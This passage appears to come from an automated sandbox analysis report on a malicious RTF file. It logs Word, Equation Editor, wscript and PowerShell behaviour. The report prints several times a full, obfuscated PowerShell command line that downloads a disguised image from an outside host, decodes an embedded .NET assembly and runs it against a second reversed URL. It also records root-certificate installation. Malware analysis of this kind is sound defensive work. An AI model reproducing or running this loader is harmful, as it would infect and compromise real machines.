Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: 4YlwTsmpuZ.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\4YlwTsmpuZ.rtf

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation

Obfuscated command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"			Jump to behavior

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior

Contains functionality to download and launch executables

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_03510668 URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_03510668

Stores large binary data to the registry

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Contains long sleeps (>= 3 min)

